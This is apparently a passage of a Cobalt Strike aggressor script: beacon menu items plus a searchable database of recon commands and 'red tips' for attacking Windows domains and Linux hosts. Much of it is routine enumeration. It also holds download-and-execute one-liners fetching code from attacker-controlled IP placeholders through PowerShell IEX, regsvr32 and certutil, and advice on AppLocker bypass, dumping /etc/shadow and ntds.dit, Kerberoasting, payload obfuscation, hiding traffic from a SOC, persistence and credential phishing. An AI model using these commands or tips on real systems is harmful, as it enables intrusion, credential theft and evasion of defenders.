openOrActivate($bid);
blog($bid, "This beacon's ID is: " . binfo($bid, "id"));
}
}
item "HTTP Egress" {
local('$bid');
foreach $bid ($1){
prompt_text("URL to assess?", "http://google.com", {
$httpDebugURL = $1;
return $httpDebugURL;
});
sleep(1);
binput($1, "powershell (New-Object System.Net.WebClient).DownloadString(\"$httpDebugURL\")");
bpowershell($1, "(New-Object System.Net.WebClient).DownloadString(\"$httpDebugURL\")");
}
}
item "Show beacon's process tree"{
local('$bid');
blog($1, "Generate this beacon's process tree...");
$b_pid = beacon_info($1, "pid");
@ps_arry = bps($1, &pstreeBpsArray);
println(@ps_arry);
}
menu "Loaded PowerShell"{
item "Are PowerShell scripts loaded?"{
local('$bid')
foreach $bid ($1){
if (data_query('cmdlets')[$bid] ne $null) {
openOrActivate($bid);
blog($bid, "\c7PowerShell Import Checker Status\cF:\c3 YES, ACTIVE POWERSHELL IMPORT\cF");
}
else {
openOrActivate($bid);
blog($bid, "\c7PowerShell Import Checker Status\cF:\c4 NO ACTIVE POWERSHELL IMPORTS\cF");
}
}
}
item "Show loaded PowerShell functions"{
local('$bid')
foreach $bid ($1){
if (data_query('cmdlets')[$bid] ne $null) {
openOrActivate($bid);
blog($bid, "\c7Current active PowerShell modules for this Beacon are: \cF" . data_query('cmdlets')[$bid]);
}
else {
openOrActivate($bid);
berror($bid, "\c4ERROR! No active powershell modules");
}
}
}
}
}
}
popup ssh {
menu "DebugKit"{
item "Display Session ID"{
local('$bid');
foreach $bid ($1) {
openOrActivate($bid);
blog($bid, "This session's ID is: " . binfo($bid, "id"));
}
}
}
}
# defs.cna
# Definitions for all the tips and commands.
# Mostly r3dqu1nn's work, with a bit of help from 001SPARTaN
# @database = @(%($cmd, $desc, @tags), %($cmd, $desc, @tags))
@database = @(
%(cmd => 'ipconfig /all', desc => 'Display all network information for all interfaces.', tags => @(
'network', 'networking', 'interfaces', 'utility', 'recon', 'enum', 'ipconfig'
)
),
%(cmd => 'systeminfo', desc => 'Display info about the system. Tip: Use | findstr to pipe out individual options.', tags => @(
'system', 'info', 'information', 'recon', 'enum', 'privesc', 'systeminfo', 'system info'
)
),
%(cmd => 'route print', desc => 'Display network routes.', tags => @(
'network', 'route', 'routes', 'print', 'recon', 'enum'
)
),
%(cmd => 'arp -a', desc => 'Display ARP table.', tags => @(
'network', 'arp', 'recon', 'enum'
)
),
%(cmd => 'wmic computersystem get [options]', desc => 'Get detailed information about the system with wmic. Use [/?] for a complete list of options', tags => @(
'computer', 'wmic', 'system', 'recon', 'enum'
)
),
%(cmd => 'wmic desktop get [options]', desc => 'Get detailed information about the desktop with wmic. Use [/?] for a complete list of options', tags => @(
'desktop', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic netlogin get [options]', desc => 'Get detailed information about netlogin with wmic. Use [/?] for a complete list of options', tags => @(
'netlogin', 'login', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic process get [options]', desc => 'Get detailed information about processes with wmic. Use [/?] for a complete list of options', tags => @(
'process', 'processes', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic service get [options]', desc => 'Get detailed information about services with wmic. Use [/?] for a complete list of options', tags => @(
'services', 'service', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic volume get [options]', desc => 'Get detailed information about volumes/drives with wmic. Use [/?] for a complete list of options', tags => @(
'volume', 'drives', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic netuse list full', desc => 'Get a full list of mapped drives with wmic.', tags => @(
'netuse', 'drives', 'recon', 'enum', 'wmic', 'mapped'
)
),
%(cmd => 'wmic startup get [options]', desc => 'Get detailed information regarding the startup of the system with wmic. Use [/?] for a complete list of options.', tags => @(
'startup', 'boot', 'bootup', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic PRODUCT get [options]', desc => 'Get detailed information about the installed software on the system with wmic. Use [/?] for a complete list of options.', tags => @(
'product', 'software', 'install', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic qfe get [options]', desc => 'Get detailed information about hotfixes installed on the system with wmic. Use [/?] for a complete list of options.', tags => @(
'qfe', 'patches', 'hotfix', 'enum', 'recon', 'kb', 'wmic'
)
),
%(cmd => 'wmic ntdomain get [options]', desc => 'Get detailed information about the Domain Controller on the network with wmic. Use [/?] for a complete list of options.', tags => @(
'ntdomain', 'DomainController', 'domain', 'dc', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic bios list full', desc => 'Get detailed information about the BIOS on the system with wmic.', tags => @(
'computer', 'hardware', 'bios', 'install', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'SET', desc => 'Get detailed information about all the %PATH% variables.', tags => @(
'computer', 'variables', 'set', 'enum', 'recon', 'user'
)
),
%(cmd => 'netstat -ano', desc => 'Get detailed information about network connections on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'netstat -ano | findstr /I listening', desc => 'Get detailed information about network connections listening on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'netstat -ano | findstr /I established', desc => 'Get detailed information about network connections established on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'nbtstat -A [Target IP]', desc => 'Returns the NetBIOS name table and MAC address of the address card for the remote computer name specified.', tags => @(
'computer', 'nbtstat', 'network', 'mac', 'enum', 'recon', 'NetBIOS'
)
),
%(cmd => 'nslookup', desc => 'Displays information that you can use to diagnose Domain Name System (DNS) infrastructure. Resolve IP <--> Domain Name.', tags => @(
'computer', 'nslookup', 'network', 'dns', 'lookup', 'enum', 'recon'
)
),
%(cmd => 'reg query [keyname]', desc => 'Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.', tags => @(
'registry', 'query', 'reghive', 'regedit', 'enum', 'recon'
)
),
%(cmd => 'reg add [keyname] [options]', desc => 'Adds a new subkey or entry to the registry.', tags => @(
'registry', 'add', 'reghive', 'regedit', 'enum', 'recon'
)
),
%(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @(
'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'sc [options]', desc => 'Communicates with the Service Controller and installed services. SC.exe retrieves and sets control information about services.', tags => @(
'sc', 'service', 'controller', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'sc [ServerName] qc [ServiceName] [BufferSize]', desc => 'Queries the configuration information for a service.', tags => @(
'sc', 'qc', 'service', 'controller', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'tasklist (/S Remote Computer) [options]', desc => 'Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.', tags => @(
'schtasks', 'list', 'time', 'persistence', 'enum', 'recon', 'tasklist', 'processes', 'process'
)
),
%(cmd => 'driverquery [/s Computer] [/u Domain\User /p Password]', desc => 'Displays a list of all installed device drivers and their properties.', tags => @(
'driver', 'driverquery', 'computer', 'hardware', 'enum', 'recon',
)
),
%(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @(
'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'gpresult /s <COMPUTER> /u <USERNAME> [options]', desc => 'Displays the Resultant Set of Policy (RSoP) information for a remote user and computer.', tags => @(
'firewall', 'RSOP', 'GPO', 'Group Policy', 'enum', 'recon', 'rules'
)
),
%(cmd => 'whoami /groups /all [options]', desc => 'Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name.', tags => @(
'user', 'groups', 'privileges', 'logon', 'enum', 'recon',
)
),
%(cmd => 'netsh firewall (advfirewall) show conf', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer. Use firewall to query firewall information.', tags => @(
'netsh', 'network', 'config', 'firewall', 'enum', 'recon', 'rules'
)
),
%(cmd => 'netsh wlan show profiles', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer.', tags => @(
'netsh', 'network', 'config', 'wlan', 'enum', 'recon', 'rules'
)
),
#net commands
%(cmd => 'net accounts [/domain]', desc => 'Updates the user accounts database and modifies password and logon requirements for all accounts.', tags => @(
'net', 'network', 'config', 'accounts', 'enum', 'recon', 'user', 'modify', 'domain', 'display'
)
),
%(cmd => 'net group "groupname" [/domain]', desc => 'Adds, displays, or modifies global groups in the domain.', tags => @(
'net', 'network', 'config', 'groups', 'recon', 'enum', 'domain', 'display'
)
),
%(cmd => 'net localgroup "groupname" [/domain]', desc => 'Adds, displays, or modifies local groups in the domain.', tags => @(
'net', 'network', 'config', 'localgroup', 'enum', 'recon', 'domain', 'display'
)
),
%(cmd => 'net view [/domain]', desc => 'Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain.', tags => @(
'net', 'network', 'config', 'view', 'enum', 'recon', 'display', 'computers', 'domain'
)
),
%(cmd => 'net session [\\ComputerName]', desc => 'Manages server computer connections. Used without parameters, net session displays information about all sessions with the local computer.', tags => @(
'net', 'network', 'config', 'session', 'enum', 'recon', 'display'
)
),
%(cmd => 'net share [options]', desc => 'Manages shared resources. Used without parameters, net share displays information about all of the resources that are shared on the local computer.', tags => @(
'net', 'network', 'config', 'resources', 'enum', 'recon', 'share', 'display'
)
),
%(cmd => 'net user [username] [/domain]', desc => 'Adds or modifies user accounts or displays user account information.', tags => @(
'net', 'network', 'config', 'user', 'enum', 'recon', 'domain', 'display'
)
),
%(cmd => 'net use * \\IP\Share /user:username [password]', desc => 'Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.', tags => @(
'net', 'network', 'use', 'pivot', 'authentication', 'resource', 'domain', 'connection', 'shared'
)
),
#powershell
%(cmd => 'IEX (New-Object Net.WebClient).DownloadString(\'http://IP/URI\')', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download'
)
),
%(cmd => 'powershell -executionpolicy bypass -nop -noni -c \'\'\'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {1};IEX (New-Object Net.WebClient).DownloadString(\"https://IP/URI\")\'\'\'', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download', 'SSL'
)
),
%(cmd => '\$code=\'code goes here\'\;[convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Encodes a byte array as a Base64 string', tags => @(
'string', 'base64', 'encode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
)
),
%(cmd => '\$code=\'code goes here\'\;[convert]::FromBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Decodes a byte array from a Base64 string', tags => @(
'string', 'base64', 'decode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
)
),
%(cmd => 'cat (Get-PSReadlineOption).HistorySavePath', desc => 'Shows all history for PS5 commands entered', tags => @(
'recon', 'stored', 'powershell', 'enum', 'history', 'commands'
)
),
%(cmd => 'Get-ADUser -Filter \* \|Where-Object \{\$_.Enabled -eq $false\}', desc => 'Returns all disabled user accounts', tags => @(
'recon', 'AD', 'powershell', 'enum', 'disabled', 'accounts', 'user'
)
),
%(cmd => 'Get-ADUser -Enabled -PasswordNeverExpires:$true', desc => 'Returns all accounts with non-expiring passwords', tags => @(
'recon', 'AD', 'powershell', 'enum', 'expire', 'accounts', 'user'
)
),
%(cmd => 'Get-ADUser -Filter \{SmartCardLogonRequired -eq $false\}', desc => 'Returns all accounts with no smart card required', tags => @(
'recon', 'AD', 'powershell', 'enum', 'smartcard', 'accounts', 'user', 'CAC'
)
),
%(cmd => 'Get-ADComputer -Filter \{OperatingSystem -Like \"Windows *Server*\"\} -Property * | Format-Table Name,OperatingSystem,OperatingSystemServicePack -Wrap -Auto', desc => 'Returns all AD Computers in a format-table', tags => @(
'recon', 'AD', 'powershell', 'enum', 'computer', 'windows server', 'OS', 'Server'
)
),
%(cmd => '(new-object Net.Sockets.TcpClient).Connect("IP", PORT)', desc => 'Tests network port access to see if the port is open', tags => @(
'recon', 'tcp', 'powershell', 'enum', 'computer', 'sockets', 'IP', 'Port', 'network'
)
),
%(cmd => '[System.Net.Dns]::GetHostbyAddress("8.8.8.8")', desc => 'Resolve IP to hostname', tags => @(
'recon', 'powershell', 'net', 'hostname', 'IP', 'dns', 'network'
)
),
%(cmd => '[System.Net.Dns]::GetHostEntry("host.domain")', desc => 'Resolve hostname to IP', tags => @(
'recon', 'powershell', 'net', 'dns', 'IP', 'hostname', 'network'
)
),
#dsquery
%(cmd => 'dsquery computer -name <name>*', desc => 'Search for computers with a name similar to <name>.', tags => @(
'computer', 'name', 'dsquery', 'recon', 'enum'
)
),
%(cmd => 'dsquery * \"CN=System,DC=computer\" -filter \"\(objectClass=trustedDomain\)\" -attr TrustPartner,FlatName,TrustDirection', desc => 'Search for Domain Controllers that are trusted and have Trust relationships within the domain', tags => @(
'computer', 'dsquery', 'recon', 'enum', 'domain controller', 'domain', 'trust'
)
),
%(cmd => 'dsquery group -name \"domain admins\" |dsget group -members -expand', desc => 'Search for Domain Admins in the domain using dsquery', tags => @(
'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'admins'
)
),
%(cmd => 'dsquery user -name <username> |dsget user -memberof -expand', desc => 'Query a specific user in the domain and the groups they are a member of using dsquery', tags => @(
'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'user'
)
),
%(cmd => 'dsquery * domainroot -filter \"\(&\(objectCategory=Person\)\(objectClass=User\)\(userAccountControl:1.2.840.113556.1.4.803:=32\)\)\"', desc => 'Query user accounts with no passwords required with dsquery', tags => @(
'accounts', 'dsquery', 'recon', 'enum', 'passwords', 'domain'
)
),
%(cmd => 'dsquery subnet -limit 0', desc => 'Returns subnet information in AD sites and services with dsquery', tags => @(
'subnet', 'dsquery', 'recon', 'enum', 'AD', 'sites', 'services'
)
),
%(cmd => 'dsquery OU', desc => 'Returns all OU information in AD with dsquery', tags => @(
'subnet', 'dsquery', 'recon', 'enum', 'AD', 'OU'
)
),
#MSSQL
%(cmd => 'sqlcmd -s localhost -q "exec sp_databases"', desc => 'Returns list of local MSSQL databases', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT count(*) FROM TABLE"', desc => 'Returns number of entries in TABLE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT TOP 10 * FROM TABLE"', desc => 'Returns top 10 rows from TABLE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT * FROM SYSOBJECTS WHERE TYPE = \'U\' ORDER BY NAME"', desc => 'Returns list of table names in DATABASE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
#Linux
%(cmd => 'cat /etc/issue', desc => 'Verify Linux distro', tags => @(
'linux', 'etc', 'issue', 'cat', 'distro'
)
),
%(cmd => 'cat /etc/*-release', desc => 'Verify exact version and distribution for Linux', tags => @(
'linux', 'cat', 'etc', 'release', 'version', 'distro'
)
),
%(cmd => 'cat /etc/*-release | grep -E \'\"NAME=\"|ID|VERSION|ID_LIKE\'', desc => 'Verify exact version and distribution for Linux', tags => @(
'linux', 'cat', 'etc', 'release', 'version', 'distro'
)
),
%(cmd => 'cat /proc/version', desc => 'Verify Linux version using proc', tags => @(
'linux', 'cat', 'proc', 'version', 'distro'
)
),
%(cmd => 'rpm -q kernel', desc => 'Get detailed information about the kernel', tags => @(
'linux', 'rpm', 'kernel'
)
),
%(cmd => 'dmesg | grep Linux', desc => 'Output kernel messages for Linux', tags => @(
'linux', 'dmesg', 'grep', 'kernel'
)
),
%(cmd => 'ls /boot | grep vmlinuz-', desc => 'Verify the name of the specific version of the kernel', tags => @(
'linux', 'ls', 'grep', 'vmlinuz-', 'kernel'
)
),
%(cmd => 'lsb_release -a', desc => 'Display information about your specific Linux distrobution', tags => @(
'linux', 'lsb_release', 'LSB', 'distro'
)
),
%(cmd => 'last -a', desc => 'Show the users who logged in last', tags => @(
'linux', 'last', 'login', 'log'
)
),
%(cmd => 'uname -a/-mrs', desc => 'Display the software and hardware information in current running Linux system', tags => @(
'linux', 'uname', 'software', 'hardware', 'system'
)
),
%(cmd => 'id', desc => 'Print user and group information for the specified USERNAME, or (when USERNAME omitted) for the current user', tags => @(
'linux', 'id', 'user', 'group', 'username'
)
),
%(cmd => 'history', desc => 'Show the last commands entered for the current user', tags => @(
'linux', 'history', 'last', 'commands', 'user'
)
),
%(cmd => 'arp -a', desc => 'Display the current arp table', tags => @(
'linux', 'arp', 'table', 'MAC'
)
),
%(cmd => 'netstat -anot', desc => 'Display network connections', tags => @(
'linux', 'net', 'stat', 'TCP', 'UDP', 'connections'
)
),
%(cmd => 'ps -elf', desc => 'View information on a selection of running processes', tags => @(
'linux', 'ps', 'elf', 'processes', 'monitor', 'status'
)
),
%(cmd => 'ps -elf | grep root', desc => 'View information on a selection of running processes owned by root', tags => @(
'linux', 'ps', 'elf', 'root', 'processes', 'monitor'
)
),
%(cmd => 'ls -la /var/www/html/', desc => 'List the contents of html directory for web resources', tags => @(
'linux', 'ls', '/var/www/html', 'web', 'html', 'listing'
)
),
%(cmd => 'service apache2 status', desc => 'View status of apache2 service', tags => @(
'linux', 'apache2', 'service', 'status', 'web'
)
),
%(cmd => 'cat /etc/resolv.conf', desc => 'View the DNS entries for your Linux distro', tags => @(
'linux', 'cat', 'etc', 'resolv.conf', 'DNS', 'distro'
)
),
%(cmd => 'cat /etc/networks', desc => 'View Linux network configuration', tags => @(
'linux', 'cat', 'etc', 'networks', 'config'
)
),
%(cmd => 'iptables -L', desc => 'Display all iptables rules', tags => @(
'linux', 'iptables', 'networking', 'rules', 'ACL'
)
),
%(cmd => 'iptables -L -t nat', desc => 'Display all natting iptables rules', tags => @(
'linux', 'iptables', 'nat', 'rules', 'ACL'
)
),
%(cmd => 'lsof -i', desc => 'List the files that are open by which process', tags => @(
'linux', 'lsof', 'list', 'files', 'process', 'open'
)
),
%(cmd => 'cat /etc/services', desc => 'View services that client applications use', tags => @(
'linux', 'cat', 'etc', 'services', 'client', 'applications'
)
),
%(cmd => 'grep 80 /etc/services', desc => 'View services that utilize port 80', tags => @(
'linux', 'grep', '80', 'web', 'services', 'port'
)
),
%(cmd => 'w', desc => 'Display who is logged into the Linux and Unix-like server, and what they are doing at command execution time', tags => @(
'linux', 'w', 'logged', 'login', 'command', 'execution'
)
),
%(cmd => 'route -n', desc => 'Display the route table for Linux/Debian based systems', tags => @(
'linux', 'route', '-n', 'routing', 'network', 'recon'
)
),
%(cmd => 'cat /etc/passwd', desc => 'Display the contents of /etc/passwd', tags => @(
'linux', 'cat', 'etc', 'passwd', 'password', 'recon'
)
),
%(cmd => 'cat /etc/passwd | awk -F : \'{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}\'', desc => 'Display only users of /etc/passwd', tags => @(
'linux', 'cat', 'etc', 'passwd', 'awk', 'regex', 'password', 'recon'
)
),
%(cmd => 'cat /etc/motd', desc => 'Display the message of the day for any sensitive info', tags => @(
'linux', 'cat', 'etc', 'motd', 'information', 'recon'
)
),
%(cmd => 'cat /etc/group', desc => 'Display the groups in /etc/group', tags => @(
'linux', 'cat', 'etc', 'group', 'recon'
)
),
%(cmd => 'cat /etc/shadow', desc => 'Display the password hashes (Must be root)', tags => @(
'linux', 'cat', 'etc', 'shadow', 'password', 'hashes', 'recon'
)
),
);
@tips = @(
%(tips => 'Use the built in net commands with Beacon! [help net]', tags => @(
'net', 'networking', 'config', 'utility', 'recon', 'enum', 'domain', 'display'
)
),
%(tips => 'Run C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config', tags => @(
'vbscript', 'networking', 'config', 'utility', 'recon', 'enum', 'script'
)
),
%(tips => 'RunDll32.exe user32.dll,LockWorkStation - Locks a users workstation', tags => @(
'rundll32', 'lock', 'workstation', 'user', 'effects'
)
),
%(tips => 'dir /s /h:a *.* - displays all hidden files', tags => @(
'dir', 'display', 'hidden', 'files', 'listing'
)
),
%(tips => 'netsh interface portproxy add v4tov4 listenport=port listenaddress=IP connectaddress=remote_ip connectport=remote_port - setup reverse port proxy on windows as a pivot', tags => @(
'netsh', 'portproxy', 'pivot', 'networking', 'interface'
)
),
%(tips => 'icacls \<file_name\> /grant \<username\>:F - grants full control permissions', tags => @(
'icacls', 'permissions', '', 'user', 'effects'
)
),
%(tips => 'regsvr32.exe /u /n /s /i:http://ip/payload.sct scrobj.dll - bypass Applocker or code execution restrictions, using regsvr32 as a one-liner', tags => @(
'regsvr32', 'one-liner', 'scrobj.dll', 'bypass', 'native', 'delivery'
)
),
%(tips => 'SystemInfo /s computername - gets remote system info', tags => @(
'systeminfo', 'computer', 'system', 'recon', 'info', 'enum'
)
),
%(tips => 'Need a map of the network? Run Bloodhound or SharpHound for faster polling!!', tags => @(
'network', 'map', 'topology', 'BloodHound', 'SharpHound'
)
),
%(tips => 'Always check sysvols!! Domain Controllers will have them, most sysvols are viewable by normal users.', tags => @(
'sysvol', 'domain controller', 'enum', 'recon', 'scripts', 'share'
)
),
%(tips => 'net user a specific user and see if they are executing any logon scripts, those might contain juicy information.', tags => @(
'net', 'user', 'recon', 'enum', 'logon', 'scripts'
)
),
%(tips => 'Always check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.', tags => @(
'folders', 'information', 'recon', 'enum', 'users'
)
),
%(tips => 'Find those Fileservers! Sysadmins leave behind all kinds of goodies there. Great for lateral movement as well.', tags => @(
'server', 'fileserver', 'sysadmin', 'lateral movement', 'enum', 'recon'
)
),
%(tips => 'Use certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.', tags => @(
'certutil', 'urlcache', 'one-liner', 'download', 'web', 'delivery'
)
),
%(tips => 'The all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring(\'http://[domainname|IP]:[port]/[file]\'))\"', tags => @(
'powershell', 'one-liner', 'web-delivery', 'web', 'delivery', 'download'
)
),
%(tips => 'Use tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.', tags => @(
'tasklist', 'remote', 'authentication', 'list', 'processes'
)
),
%(tips => 'Enable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f', tags => @(
'RDP', 'registry', 'config', 'windows', 'regedit'
)
),
%(tips => 'Please wrap/encode/pack your payloads if you have to drop to disk! - use veil/upx/Invoke-Obfuscation/In-Memory type of payloads', tags => @(
'pack', 'wrap', 'encode', 'upx', 'veil', 'payload', 'Invoke-Obfuscation'
)
),
%(tips => 'Try to stay in memory and avoid putting files on disk. (powershell-import)', tags => @(
'Memory', 'inject', 'fileless', 'payload', 'files'
)
),
%(tips => 'Live off the land!! Use what is on the target, native windows binaries are very powerful! (ex. forfiles, rundll32)', tags => @(
'native', 'windows', 'binaries', '', 'processes'
)
),
%(tips => 'Use AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.', tags => @(
'AD', 'schemes', 'sysadmins', 'IT', 'naming'
)
),
%(tips => 'Enterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!', tags => @(
'admins', 'enterprise', 'AD', 'password', 'lateral movement', 'pivot'
)
),
%(tips => 'Invoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.', tags => @(
'Invoke-NinjaCopy', 'powershell', 'ntds.dit', 'SYSTEM', 'password', 'cracking'
)
),
%(tips => 'Have multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.', tags => @(
'persistence', 'presence', 'foothold', 'network', 'operations', 'security'
)
),
%(tips => 'cmd.exe and powershell.exe blocked by GPO? Find a process that is user owned and started on bootup for process injection to bypass that. Try forfiles as well.', tags => @(
'cmd', 'powershell', 'GPO', 'list', 'injection', 'forfiles', 'bypass'
)
),
%(tips => 'Just because you acquired initial access does not mean you stop doing recon. Network/Host Enumeration is always the most important part.', tags => @(
'initial', 'recon', 'enum', 'network', 'host', 'harvesting'
)
),
%(tips => 'Invoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.', tags => @(
'powershell', 'powersploit', 'network', 'machine', 'DNS', 'awareness', 'recon', 'enum'
)
),
%(tips => 'Need a Temporary web server? Use Python! python -m SimpleHTTPServer [port]', tags => @(
'web', 'server', 'python', 'http', 'services'
)
),
%(tips => 'Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.', tags => @(
'redtip', '#1', 'user agent', 'outlook', 'traffic'
)
),
%(tips => 'Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.', tags => @(
'redtip', '#2', 'SOC', 'proxy', 'analysis', 'logs', 'cookies'
)
),
%(tips => 'Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.', tags => @(
'redtip', '#3', 'snapshot', 'AD', 'attacks'
)
),
%(tips => 'Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.', tags => @(
'redtip', '#4', 'Office', 'macros', 'persistence', 'VDI'
)
),
%(tips => 'Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.', tags => @(
'redtip', '#5', 'DNS', 'recon', 'enum'
)
),
%(tips => 'Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell', tags => @(
'redtip', '#6', 'wmic', 'DNS', 'assets'
)
),
%(tips => 'Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.', tags => @(
'redtip', '#7', 'PSEXEC', 'WMI', 'powershell', 'COM', 'RDP'
)
),
%(tips => 'Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!', tags => @(
'redtip', '#8', 'emails', 'delivery', 'payload'
)
),
%(tips => 'Red tip #9: When PowerUp yields no results, dont forget SysInternals AutoRuns. Often you can find unexpected surprises :)', tags => @(
'redtip', '#9', 'PowerUp', 'sysinternals', 'AutoRuns'
)
),
%(tips => 'Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.', tags => @(
'redtip', '#10', 'BloodHound', 'DA', 'groups', 'mapping'
)
),
%(tips => 'Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.', tags => @(
'redtip', '#11', 'topology', 'network', 'AD', 'OU', 'lateral movement'
)
),
%(tips => 'Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat', tags => @(
'redtip', '#12', 'Kerberoast', 'hashes', 'services', 'powershell', 'DA'
)
),
%(tips => 'Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away', tags => @(
'redtip', '#13', 'administrator', 'account', 'hashes', 'lateral movement', 'machines'
)
),
%(tips => 'Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.', tags => @(
'redtip', '#14', 'credentials', 'egress', 'channels', 'account'
)
),
%(tips => 'Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.', tags => @(
'redtip', '#15', 'phish', 'payload', 'Citrix', 'VPN', 'email'
)
),
%(tips => 'Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organization.', tags => @(
'redtip', '#16', 'AD', 'credentials', 'organization'
)
),
%(tips => 'Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally', tags => @(
'redtip', '#17', 'Ruler', 'Outlook', 'code', 'execution', 'exchange'
)
),
%(tips => 'Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks', tags => @(
'redtip', '#18', 'burpsuite', 'burp', 'MailSniper'
)
),
%(tips => 'Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)', tags => @(
'redtip', '#19', 'DC', 'LOGONSERVER', 'nltest', 'nslookup', 'kerberos'
)
),
%(tips => 'Red tip #20: So apparently not many people use SSH for redirector setup. So try out SSH c2 -R *:80:localhost:80. SSH config GatewayPorts yes', tags => @(
'redtip', '#20', 'SSH', 'redirector', 'c2', 'config'
)
),
%(tips => 'Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.', tags => @(
'redtip', '#21', 'shares', 'user', 'startup', 'privesc', 'lateral movement'
)
),
